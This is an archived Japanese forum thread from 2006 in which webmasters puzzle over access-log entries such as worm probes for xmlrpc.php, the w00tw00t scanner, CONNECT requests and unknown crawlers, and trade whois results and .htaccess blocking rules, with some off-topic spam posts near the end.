n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 216 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 220 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 214 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 217 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 214 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 217 "-" "-"

なんだろ?

683 :バッカーです ◆KeuXjwWDdE :2006/04/20(木) 02:59:36 ID:???
xmlrpc.phpを狙うワーム(Linux/Lupper.wormとか)にmixi内のPCが感染したと考えるのが素直

684 :DNS未登録さん:2006/04/23(日) 15:32:12 ID:???
inktomisearch.comが意味不明な引数つけてGETしてくるんだけど
なんででしょ?
index.php?hoge
とか
index.php?i=y1111&server=hoge
とか

別にそれでも普通に見れるんだけど

685 :DNS未登録さん:2006/04/23(日) 19:07:03 ID:???
どこかでそういうリンクがあるんじゃないの?

686 :DNS未登録さん:2006/04/24(月) 22:52:51 ID:???
>>685
レスd

うちだけじゃなかったようで、こんなん出ました。

http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=i%3Dy1190%26server%3DSirius%26l%3Doffa+
http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=main%3Dview%26select%3Dw4%26server%3DCanopus
http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=main%3Dview%26select%3Dy9%26server%3DRigel+


 ・・(゚д゚)・・?

687 :DNS未登録さん:2006/04/25(火) 23:27:39 ID:Nc/mRxvX
GET /thisdoesnotexistahaha.php って何だろう?
http://www.google.co.jp/search?num=100&hl=ja&q=%22GET+%2Fthisdoesnotexistahaha.php%22

688 :DNS未登録さん:2006/04/26(水) 00:29:19 ID:???
存在しないよアハハ

689 :DNS未登録さん:2006/05/04(木) 10:23:28 ID:???
ここが参考になった。
http://www.webmasterworld.com/forum39/3836.htm

690 :DNS未登録さん:2006/05/15(月) 19:59:32 ID:???
サーバーログにwww.gigablast.comがあってこれをアクセス拒否したいのですが、
whoisでIP調べて.htaccessに
order allow,deny
allow from all
deny from 66.154.102.171
と記述したのですが、翌日以降もstatusコード200となっていて正常にアクセスしてきています。
どうすれば拒否出来ますか?

691 :DNS未登録さん:2006/05/15(月) 20:18:09 ID:???
gigablast.com
ではじけばいいじゃn

692 :DNS未登録さん:2006/05/15(月) 20:21:43 ID:???
これって何?

68.78.88.185 - - [15/May/2006:09:52:37 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"


693 :DNS未登録さん:2006/05/15(月) 22:02:59 ID:???
ぐぐれ
http://www.google.co.jp/search?q=%22w00tw00t.at.ISC.SANS.DFind%22

694 :DNS未登録さん:2006/05/15(月) 23:30:24 ID:???
ホスト名ではじくと負荷がかかる(らしい)のでIPアドレスではじきたいんです。
思うにホスト名が同じでもIPアドレスだけ変化しているんだと思うんです。
使っているIPアドレスの範囲ってどうやって調べればいいんでしょうか?


695 :DNS未登録さん:2006/05/16(火) 00:24:39 ID:???
ipでwhois

InfoRelay Online Systems, Inc. ASSERTIVE-66-154-100-0-22 (NET-66-154-100-0-1)
66.154.100.0 - 66.154.103.255
Gigablast, Inc. GIGABLAST-SJC-1 (NET-66-154-102-0-1)
66.154.102.0 - 66.154.103.255
ASSERTIVENET ASSERTIVENETWORKS (NET-66-154-96-0-1)
66.154.96.0 - 66.154.127.255

# ARIN WHOIS database, last updated 2006-05-14 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.



696 :DNS未登録さん:2006/05/16(火) 06:09:31 ID:???
>>693
当然先にぐぐっているが、誰がどういう意図で残したものかを解説しているところは見つからなかった。
単なる脆弱性さがしなら、こんなメッセージを残す意味ないでしょ?


697 :DNS未登録さん:2006/05/16(火) 09:03:24 ID:???
WebAlizerですが、特定のディレクトリへのアクセスはカウントしない方法はありますか?


698 :DNS未登録さん:2006/05/16(火) 19:23:35 ID:???
695ありがd

699 :DNS未登録さん:2006/05/18(木) 23:18:26 ID:???
>696
日本語の検索結果だけ見てる?

> 単なる脆弱性さがしなら、こんなメッセージを残す意味ないでしょ?
      ↑
ごめん。意味わからん。


700 :DNS未登録さん:2006/05/19(金) 19:42:07 ID:???
>>699
頭悪いんだな

701 :DNS未登録さん:2006/05/20(土) 00:01:34 ID:???
>>700
漏れも頭悪いんで解説して

702 :バッカーです ◆KeuXjwWDdE :2006/05/20(土) 00:23:15 ID:???
漏れ漏れも

703 :DNS未登録さん:2006/05/20(土) 01:16:24 ID:???
http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/

脆弱性発見ツールだね。
といっても、攻撃するためのツールじゃなくて、
攻撃されないように自分の弱点を予め洗い出すためのツール。
だから明確な足跡を残すんだよ。隠す必要ないから。

704 :DNS未登録さん:2006/06/12(月) 06:11:49 ID:???
保守ってみる

705 :DNS未登録さん:2006/06/22(木) 23:23:57 ID:???
亀レス>>697
webalizer.conf で HideURL を設定すればいいんじゃない?

しかしまあ
力の限りアクセスしまくってくるプリフェッチャは( ゚д゚)コマル
数秒ディレイを設けてください。

706 :DNS未登録さん:2006/07/12(水) 09:58:48 ID:TdKm2eeX
awstats?config=www2
って指定することがようやく分かった。
マニュアルで見つけられなかった。
ところで、 awstats ってそれ自体には認証ないの?
しょぼいけど htpasswd でのBASIC認証でも掛けとくかな。

707 :DNS未登録さん:2006/07/13(木) 15:12:02 ID:???
>706
常に脆弱性が見つかっているawstatsに、認証を任せるのは無意味。
あえてapacheにやらせるべき。


708 :DNS未登録さん:2006/07/13(木) 16:07:18 ID:???
フォルダ名をパスワードみたいにしとけば良いんじゃないの?

709 :DNS未登録さん:2006/07/13(木) 17:34:11 ID:???
(゚д゚)?

710 :DNS未登録さん:2006/07/13(木) 17:43:42 ID:???
たしかにねー、何らかの文字を入力せにゃならんてことでは
BASIC認証と大差ない気がしないでもないけど、
どこかにリンクでも貼った日にはリファラが・・・・

711 :DNS未登録さん:2006/07/21(金) 06:35:28 ID:???
ログ見てて気付いたが、NAVER検索って終了した筈なのにボットは生きてるのか。
本国のボット…?

712 :DNS未登録さん:2006/07/23(日) 03:01:46 ID:???
Lunascape は favicon 取る時に USER_AGENT にゴミを吐くのを直して欲しいぞ。

713 :DNS未登録さん:2006/07/26(水) 12:25:39 ID:LUiQQ9TQ
多段proxyのログ解析に良いフリーソフトありまつか?

714 :DNS未登録さん:2006/07/26(水) 22:36:45 ID:???
さっきさらした画像の直リンクURLへのアクセスログ見てて思ったんだが、
IE6とか7ってURLのディレクトリ部分までをrefererに吐くのか?
それとも何かのツールなのか。
URLそのままrefererに入ってるのもあるなぁ・・・

715 :DNS未登録さん:2006/08/02(水) 10:26:12 ID:???
UA: Robo Crawler 6.4.5 (robocrawler@bb.softbank.co.jp)
について何か知ってる人いない?

716 :DNS未登録さん:2006/08/05(土) 23:59:44 ID:???
メールして聞いてみれば?

717 :DNS未登録さん:2006/08/06(日) 09:51:13 ID:???
Delivery Status Notification (Delay) x2
Delivery Status Notification (Failure)
ですた。

robots.txtにリクエストはあるが、
User-Agent: robocrawler
には反応せず

うちに来たのは
216.255.229.231
216.255.229.233

全てのファイル、リンク先を根こそぎクロールする
softbankを騙ってるような気が・・

718 :DNS未登録さん:2006/08/06(日) 11:56:31 ID:???
そのIPアドレスは日本テレコムに割り当てられているから
確かに禿んとこだよ。

719 :DNS未登録さん:2006/08/07(月) 00:15:46 ID:???
推測と事実を混同すんなよ。

720 :DNS未登録さん:2006/08/07(月) 03:53:34 ID:???
>>718
確かにwhoisでIDCにはなってるけどさ・・

721 :DNS未登録さん:2006/08/07(月) 21:54:13 ID:???
Naverだったりして・・・ あそこは Google を騙ったことすらあるからねぇ。

722 :DNS未登録さん:2006/08/08(火) 15:58:07 ID:+db7b8Uj
・巨人Naverの日本再上陸作戦--新兵器“韓国のGoogle”とは・・・ - CNET Japan
http://japan.cnet.com/column/korea/story/0,2000067066,20192148,00.htm
こんな記事があった。
安心したらダメだ、気をつけよう。
1noon って気持ち悪いボットだなと前から弾いてたが、お仲間だったのか…。

723 :DNS未登録さん:2006/08/11(金) 09:58:59 ID:???
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

こんなアホなUAを返してくる掲示板spammerがいた(笑)。
("User-Agent: "も含めたUAを名乗ってきている)

724 :DNS未登録さん:2006/08/11(金) 23:00:50 ID:???

SetEnvIfNoCase User-Agent "^user-agent" forbidden

<Files *>
order allow,deny
deny from env=forbidden
allow from all
</Files>

725 :DNS未登録さん:2006/09/17(日) 22:31:14 ID:4ce0rwz+
MSBlasterの亜種からのアクセスが未だに来るね。

060917214622 219.128.162.215 "GET / HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 403 56

いい加減駆除しろっての。

726 :DNS未登録さん:2006/09/17(日) 23:20:48 ID:???
報告すればいいじゃん。
おまい→ISP→感染ユーザー。

727 :DNS未登録さん:2006/09/18(月) 01:02:58 ID:???
Windows 98のサポートが終了したから心置きなくDenyできるのか。

728 :DNS未登録さん:2006/09/18(月) 11:45:16 ID:???
98使ってた人何に移動するんだろうね?軽量版linuxかな?

729 :DNS未登録さん:2006/09/18(月) 13:30:00 ID:???
>>725
そのIPアドレスは中国のだから、何言ってもムダだろう。

730 :DNS未登録さん:2006/09/18(月) 13:53:43 ID:???
わざと放置して、虚弱性残したままの鯖探してるのかもよw

731 :DNS未登録さん:2006/09/18(月) 15:25:39 ID:???
虚弱性じゃなくて脆弱性な。アリナミンで治るわけじゃないんだから。

732 :DNS未登録さん:2006/09/18(月) 17:59:26 ID:???
ちなみに読み方は「ぜいじゃくせい」な。
「きじゃくせい」でも「きょじゃくせい」でもないぞ。

733 :DNS未登録さん:2006/09/18(月) 20:16:22 ID:???
巨雀

734 :DNS未登録さん:2006/09/20(水) 19:39:48 ID:???
月危 弓弓 小生

735 :DNS未登録さん:2006/09/23(土) 15:42:27 ID:???
「ネットランナー」でオベンキョーしたのかもね。
http://takagi-hiromitsu.jp/diary/20060429.html


736 :DNS未登録さん:2006/09/25(月) 10:04:59 ID:???
虚弱性がアリナミンで治るかどうかも疑わしいがな

737 :DNS未登録さん:2006/09/25(月) 23:51:11 ID:???
まぁ、一時的に元気にはなるぞ。あくまで一時的にだが。

738 :DNS未登録さん:2006/09/26(火) 04:13:40 ID:???
ウィルスを駆除してもう大丈夫だ!って油断する奴が多いから
あながち間違いでもないような気がするわけだがw

739 :DNS未登録さん:2006/09/26(火) 22:16:28 ID:???
そういえば、一昔前は「ワクチン」という言い方が流行ったよな。

740 :DNS未登録さん:2006/09/27(水) 00:05:54 ID:???
>>739
ウイルスに感染したファイルからウイルスだけを取り除く/予防することが出来た
古き良き時代の話だな。今ではOSそのものの複雑化(主にWindows)とウイルスの
高度化のおかげでウイルスだけを取り除く/予防することはほぼ不可能なのが
当たり前になってしまい、従って「ワクチン(予防薬)」という呼び方もされなく
なってしまったんだよな。

741 :DNS未登録さん:2006/10/03(火) 00:12:27 ID:???
謎のUA 1.0はもうアクセスが少なくなったからどうでもいいといえばいいんだけど、3ヶ月前に作った
新しいファイルにアクセスしてきたもんだから、ちょっと驚いた。

パターンは相変わらず。
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET /~foo/bar.html HTTP/1.0" 200 abcd "-" "1.0"
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET /~foo/ HTTP/1.0" 200 abcd "-" "1.0"
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET / HTTP/1.0" 200 abcd "-" "1.0"




742 :DNS未登録さん:2006/10/18(水) 21:32:26 ID:???
>キーウォーカー、プロガーのプロファイリングを可能にする検索サービス
http://internet.watch.impress.co.jp/cda/news/2006/10/18/13655.html
気持ち悪いサービスを予防的に蹴っておこうと思うんだが、UA名とかわかる人いる?

743 :DNS未登録さん:2006/10/21(土) 12:01:15 ID:???
とりあえずipで予防線張っとくのはどう?

744 :DNS未登録さん:2006/10/21(土) 16:54:59 ID:???
それもやってみる。

745 :DNS未登録さん:2006/10/23(月) 03:15:07 ID:???
いったいどうやってIPアドレスを調べるというのだろう。

746 :DNS未登録さん:2006/10/28(土) 19:45:23 ID:???
ブログへのコメントスパムボットのUA名。
Jakarta Commons-HttpClient/*.**

同じくTBスパムボットのUA名。
TrackBack/*.**
tb_send/*.**

/のあとの、*.**の部分はバージョン(1.01とか、3.0とか)らしい数字。
tb_sendはネット上で公開されてるPerlの例文で提示されてるものを、スパマーが
そのまんま使ってるらしい。
tb_send/は日本語、TrackBack/ と Jakarta Commons-HttpClient/ は英文スパム。

747 :DNS未登録さん:2006/10/29(日) 04:25:08 ID:???
あー、そういや、Good Design! とか Nice Site!、Great Work! とだけ書いて
あとはURLをずらずら貼り付けていくスパマーがいるが、それを弾くには

SetEnvIfNoCase Range "bytes=0-0" forbidden
<Files *>
order allow,deny
deny from env=forbidden
</Files>

でいいことに最近気が付いた。

748 :DNS未登録さん:2006/10/29(日) 17:18:32 ID:???
そんな分かりやすそうなヘッダ吐いてたんだ

749 :DNS未登録さん:2006/11/16(木) 14:57:58 ID:???
逆引きできないIPが大量にログに残ってたんで調べてみると

OrgName: TREND MICRO INCORPORATED
OrgID: TREND-7
Address: 10101 N. De Anza Blvd,
City: Cupertino
StateProv: CA
PostalCode: 95014
Country: US
NetRange: 66.180.80.0 - 66.180.95.255

これって米トレンドマイクロの中の人がアクセスしてる?
それともFW製品の代理プロキシか何かかな…
コンテンツから考えて、アクセスがあるはずないんだけど…謎

750 :DNS未登録さん:2006/11/16(木) 18:13:49 ID:???
あ、それ、ウチにも来るよ。

その直後に同一URLへのまともなアクセスがあるから
>それともFW製品の代理プロキシか何かかな…
っぽいね。
ページに脅威がないかどうかチェックしてくれるサービスじゃないだろうか。

ちなみに、UAは
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
のはず。

751 :DNS未登録さん:2006/11/16(木) 21:04:37 ID:???
>>750
レスとうも。
UAは確かにそれです。
調べてみたら同一時刻か1秒後ぐらいに、本来のアクセスらしいのがありました。
何か鬱陶しいので、iptablesで弾こうか…

752 :DNS未登録さん:2006/11/17(金) 03:21:37 ID:???
でも、それ弾くと本来のアクセスに悪影響が出るんじゃないかなあ?
出ないかもしれないけど。

753 :DNS未登録さん:2006/11/18(土) 00:47:47 ID:???
言われてみればそうかも…
その代理プロキシ(?)がページのチェックに失敗したらどうなるのかな?
「脅威が発見されました!」となるかもね。

754 :NRV91KM652:2006/11/18(土) 09:26:50 ID:CIbLRJ1f
>>91ああ

755 :NRV91KM652:2006/11/18(土) 09:30:12 ID:CIbLRJ1f
DQNはスグにライバルを叩こうとする

756 :DNS未登録さん:2006/11/18(土) 09:31:02 ID:CIbLRJ1f
>>91

757 :NRV91KM652:2006/11/18(土) 11:01:08 ID:CIbLRJ1f
ああ

758 :NRV91KM652:2006/11/18(土) 16:32:51 ID:Vq04lh2J
klfgkvglfckjfcjこいrtjmrthyjfjkhf

759 :NRV91KM652:2006/11/18(土) 16:34:59 ID:Vq04lh2J
な、何でお前にくそ〜
ギコに〜くはぁ

760 :NRV91KM652:2006/11/18(土) 16:38:09 ID:Vq04lh2J
ドラクエ3で神龍を倒せません倒し方を教えて下さい。

761 :NRV91KM652:2006/11/18(土) 16:39:44 ID:Vq04lh2J
本当に教えて下さい

762 :NRV91KM652:2006/11/18(土) 16:41:33 ID:Vq04lh2J
ゾーマを倒したけど神龍が倒せません

763 :NRV91KM652:2006/11/18(土) 16:42:56 ID:Vq04lh2J
皆さん持ってますかドラクエ3を本当に持ってますか

764 :DNS未登録さん:2006/11/18(土) 18:05:07 ID:mr7RuZXw
オルゴデミーラ最終頑張っても配合できません
方法教えて下さい

765 :DNS未登録さん:2006/11/19(日) 19:19:12 ID:fCwayPDQ
ここで質問していいものかわからないのですが、聞いてもよかですか?
最近、トップページだけ見に来るへんな人がいるんですけど
時間はバラバラなんですが、とにかく定期的にトップページだけ
見に来るんです。悪さするわけじゃないけど、ログをみるとウインドウズじゃなく
Linux&ネスケで、だからって変ですが、何となく激しく不安です
かといって、IPで弾いたら機嫌損ねてクラッカーのスイッチ入っちゃうかもしれないし・・・
定期的にトップページだけ見に来る人は、何をしに来ているんでしょうか
相手が仮にクラッカーだという前提で可能性を教えてください
すげーへんな質問なのはわかってます

766 :DNS未登録さん:2006/11/19(日) 20:44:46 ID:f36OGSeS
前提がおかしいと思う。

767 :DNS未登録さん:2006/11/19(日) 21:37:24 ID:fCwayPDQ
おかしいすか
いや、そういう人があんまりいないから不気味なんですよ
だってトップページ見て即座に帰る人って、ページのコンテンツに興味があるとは
思えないじゃないですか
なのに定期的にトップページだけ覗きに来る
カウンターがあるわけでもないし何しにきてんねやろって感じなんすよ

768 :DNS未登録さん:2006/11/19(日) 21:38:04 ID:fCwayPDQ
おかしいすか
いや、そういう人があんまりいないから不気味なんですよ
だってトップページ見て即座に帰る人って、ページのコンテンツに興味があるとは
思えないじゃないですか
なのに定期的にトップページだけ覗きに来る
カウンターがあるわけでもないし何しにきてんねやろって感じなんすよ

769 :DNS未登録さん:2006/11/19(日) 21:43:37 ID:fCwayPDQ
おかしいすか
しかしですよ、毎回トップページだけ見て帰るような人が、ページの内容に興味があるとは
思えないじゃないすか
それなのに何度も何度も定期的にトップページにだけ訪れるって・・・
何しにきてはんねやろって思いません?
何か調べに来てるんだろうか、とか思っちゃいましたんで質問しました

770 :DNS未登録さん:2006/11/19(日) 21:44:45 ID:???
あ、すんません、なんで3連投になってるんだろう・・・

771 :DNS未登録さん:2006/11/19(日) 21:45:24 ID:???
GET / HTTP/1.1してオサラバなんてよくあることだ。きにするな。

772 :DNS未登録さん:2006/11/21(火) 05:41:41 ID:GHhnJzIl
質問させて下さい

最近、というか今AWStats65をインストールして
設定したんですが、これを限られた人間だけが
外部のPCから見るようにするには、どうしたら良いでしょうか?

アクセスしても


>Access forbidden!

>要求されたオブジェクトへのアクセス権がありません。
>読み込みが許可されていないか、
>サーバが読み込みに失敗したかでしょう。

と、まぁ当然なるのですが、何か解決方法がありますかね?
Linux自体最近触り始めたもんで、アホ過ぎる質問でしたら、すまんです

773 :DNS未登録さん:2006/11/21(火) 18:41:37 ID:???
apacheのエラーログがどうでてるか見ろ。

774 :DNS未登録さん:2006/11/21(火) 20:45:23 ID:???
>>772
IP認証によるアクセス制限
ttp://www.atmarkit.co.jp/flinux/rensai/apache09/apache09a.html

ユーザー認証によるアクセス制限
ttp://www.atmarkit.co.jp/flinux/rensai/apache10/apache10a.html

775 :DNS未登録さん:2006/11/21(火) 22:10:33 ID:???
atmarkitってインストールガイドとしては使えないよな。

776 :DNS未登録さん:2006/11/22(水) 03:29:48 ID:???
>>775
手を付ける前なら読む価値あるよ。
1ヶ月くらい繰り返し読んでイメージだけを頭に植え付ける。

777 :DNS未登録さん:2006/11/23(木) 08:07:49 ID:???
なんか方向性が間違ってないか?
>>772は「見えないから見えるようにしたい」と言っているのに
「見えなくする方法」ばかり教えても意味がないぞ。

778 :DNS未登録さん:2006/11/23(木) 14:14:02 ID:???
ヒント:これを限られた人間だけが外部のPCから見るようにするには

779 :DNS未登録さん:2006/11/23(木) 14:25:17 ID:???
お返しのヒント:アクセスしても Access forbidden! と、まぁ当然なるのですが、何か解決方法がありますかね?


780 :DNS未登録さん:2006/11/24(金) 23:33:46 ID:???
まぁ、まず最初に「誰にも見えない原因」を究明にして、
その後で「特定の人からだけ見えるようにする方法」を調べる、と
そういう順番で解決する必要があるわけだ、この人の場合。

781 :DNS未登録さん:2006/11/25(土) 00:07:22 ID:???
この人達は何をしたいんでしょうか…

"GET / HTTP/1.0" 403 198 "-" "check_http/1.89 (nagios-plugins 1.4.3c)"
"GET / HTTP/1.0" 403 198 "-" "Yamada-Search/0.21 (Windows NT/5.1; Build 2600; Service Pack 1)"

782 :DNS未登録さん:2006/11/25(土) 01:27:50 ID:???
ググればすぐに判るだろ?

783 :DNS未登録さん:2006/11/28(火) 22:52:27 ID:???
ヤマダサーチ…

784 :DNS未登録さん:2006/11/30(木) 08:12:44 ID:???
これって何?

CONNECT mx2.mail2000.com.tw:25 HTTP/1.0

785 :DNS未登録さん:2006/12/01(金) 08:11:33 ID:???
>>784
CONNECTメソッドくらい検索すればすぐに解ることだろうに。

786 :DNS未登録さん:2006/12/02(土) 14:04:13 ID:???
>>784
そもそもどこから持って来たログ?
25番ポート(SMTPポート)にHTTPでコネクトしようとすること自体がおかしいんだが。

787 :DNS未登録さん:2006/12/02(土) 14:14:48 ID:???
あ、コネクトの段階だとHTTPだろうがSMTPだろうが関係ないよな。
正確に言うと、CONNECTとHTTPがログの同じ行に現れること自体がおかしい、ということで。

788 :DNS未登録さん:2006/12/02(土) 14:19:16 ID:???
うああああ、HTTPにCONNECTというメソッドがあるんだな。知らなかった。
TCP/IPのconnectだと勘違いしていたよ。socketしてconnectして、の。

789 :DNS未登録さん:2006/12/02(土) 19:41:03 ID:???
HTTPトンネリングするとログに出てくるね。>CONNECT

ところで、最近nagios-pluginsがウゼェ。mod_rewriteで302にしてるけど。

790 :DNS未登録さん:2006/12/02(土) 19:53:10 ID:???
要するにCONNECTメソッド(主にhttps proxyに使うはずのものだが)をサポートした
http server (事実上のトンネル) かどうかをチェックしてるわけだな。

791 :DNS未登録さん:2006/12/08(金) 19:47:50 ID:???
061204123130 150.61.31.78 "GET /cgi-bin/PMUM/PMUM.exe HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 404 240

なにこれ。スパム業者は氏ねよ。

792 :DNS未登録さん:2006/12/08(金) 21:15:50 ID:???
>>791
$ whois -h whois.nic.ad.jp 150.61.31.78

[ JPNIC database provides information regarding IP address and ASN. Its use ]
[ is restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 150.61.0.0/16
b. [ネットワーク名] CANON-NET
f. [組織名] キヤノン株式会社
g. [Organization] Canon Inc.
m. [管理者連絡窓口] NT3234JP
n. [技術連絡担当者] HK10602JP
p. [ネームサーバ] ns1.canon.co.jp
p. [ネームサーバ] ns1.fine.ad.jp
p. [ネームサーバ] ns2.canon.co.jp
p. [ネームサーバ] ns3.canon.co.jp
[割当年月日] 1991/06/17
[返却年月日]
[最終更新] 2005/08/22 16:24:43(JST)

上位情報
----------
該当するデータがありません。

下位情報
----------
該当するデータがありません。

アハハハハハハハハハ(゚∀゚)ハハハハハハハ

793 :DNS未登録さん:2006/12/15(金) 20:54:12 ID:???
祭りと聞いて飛んできました

794 :DNS未登録さん:2006/12/15(金) 20:54:14 ID:???
祭りと聞いて飛んできました

795 :DNS未登録さん:2006/12/16(土) 14:16:24 ID:???
飛んで火に入る夏の蟲

796 :DNS未登録さん:2006/12/16(土) 20:31:26 ID:???
スパム対策のサイトに出入りしてると、たまにボットネットの存在を知らずに
社員=犯人だと思い込んで騒いでるアホがいて面白い。

797 :DNS未登録さん:2006/12/20(水) 03:03:08 ID:???
あと一般ISPのホスト名やIPアドレスにwhoisかけた結果を持ち出して
「NTTの社員の仕業だ!」「KDDIの社員だった!」と騒ぐやつとかね。

185 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)